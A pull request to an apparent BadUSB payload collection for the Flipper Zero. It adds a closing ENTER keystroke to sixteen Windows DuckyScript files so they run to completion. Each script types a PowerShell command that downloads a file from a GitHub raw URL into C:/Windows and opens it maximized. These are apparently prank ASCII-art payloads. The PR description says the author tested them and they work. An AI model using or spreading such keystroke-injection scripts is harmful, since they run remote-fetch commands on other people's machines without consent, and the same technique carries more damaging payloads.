### PR TITLE
add ENTER at EOF for windows/ascii/downloadascii files

### DIFF
--- a/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/ghostbuster.txt
+++ b/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/ghostbuster.txt
@@ -15,3 +15,4 @@ DELAY 500
 ENTER
 DELAY 700
 STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/ghostbusters.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized
+ENTER

--- a/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/happyBday.txt
+++ b/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/happyBday.txt
@@ -15,3 +15,4 @@ DELAY 500
 ENTER
 DELAY 700
 STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/happyBDAY.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized
+ENTER

--- a/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/indian-tech-support.txt
+++ b/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/indian-tech-support.txt
@@ -15,3 +15,4 @@ DELAY 500
 ENTER
 DELAY 700
 STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/indian-tech-support.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized
+ENTER

--- a/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/koolaid.txt
+++ b/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/koolaid.txt
@@ -15,3 +15,4 @@ DELAY 500
 ENTER
 DELAY 700
 STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/koolaid.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized
+ENTER

--- a/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/memelaugh.txt
+++ b/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/memelaugh.txt
@@ -15,3 +15,4 @@ DELAY 500
 ENTER
 DELAY 700
 STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/memelaugh.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized
+ENTER

--- a/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/mrbean.txt
+++ b/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/mrbean.txt
@@ -15,3 +15,4 @@ DELAY 500
 ENTER
 DELAY 700
 STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/mrbean.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized
+ENTER

--- a/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/mrbeanagain.txt
+++ b/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/mrbeanagain.txt
@@ -15,3 +15,4 @@ DELAY 500
 ENTER
 DELAY 700
 STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/mrbeanagain.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized
+ENTER

--- a/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/ok.txt
+++ b/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/ok.txt
@@ -15,3 +15,4 @@ DELAY 500
 ENTER
 DELAY 700
 STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/ok.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized
+ENTER

--- a/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/pepefat.txt
+++ b/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/pepefat.txt
@@ -15,3 +15,4 @@ DELAY 500
 ENTER
 DELAY 700
 STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/pepeFAT.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized
+ENTER

--- a/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/pepefrog.txt
+++ b/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/pepefrog.txt
@@ -15,3 +15,4 @@ DELAY 500
 ENTER
 DELAY 700
 STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/pepeFROG.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized
+ENTER

--- a/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/riddle.txt
+++ b/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/riddle.txt
@@ -15,3 +15,4 @@ DELAY 500
 ENTER
 DELAY 700
 STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/riddle.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized
+ENTER

--- a/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/stormtrooper.txt
+++ b/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/stormtrooper.txt
@@ -15,3 +15,4 @@ DELAY 500
 ENTER
 DELAY 700
 STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/stormtrooper.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized
+ENTER

--- a/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/trollface.txt
+++ b/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/trollface.txt
@@ -15,3 +15,4 @@ DELAY 500
 ENTER
 DELAY 700
 STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/trollface.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized
+ENTER

--- a/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/trollface2.txt
+++ b/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/trollface2.txt
@@ -15,3 +15,4 @@ DELAY 500
 ENTER
 DELAY 700
 STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/trollface2.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized
+ENTER

--- a/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/trollface3.txt
+++ b/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/trollface3.txt
@@ -15,3 +15,4 @@ DELAY 500
 ENTER
 DELAY 700
 STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/trollface3.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized
+ENTER

--- a/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/trollfaceDANCE.txt
+++ b/BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/trollfaceDANCE.txt
@@ -15,3 +15,4 @@ DELAY 500
 ENTER
 DELAY 700
 STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/trollfaceDANCE.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized
+ENTER


### PR DESCRIPTION
Tested original files with my flipper and noticed that the downloadascii scripts don't fully execute as they are missing a enter command at the end of the file.

Additions:
- "ENTER" on a newline at the EOF in each .txt file in ./Windows_Badusb/ASCII/DownloadAscii directory

Removals:
- None

Functional Compliance:
- Tested subset with flipper zero and are confirmed to work as intended.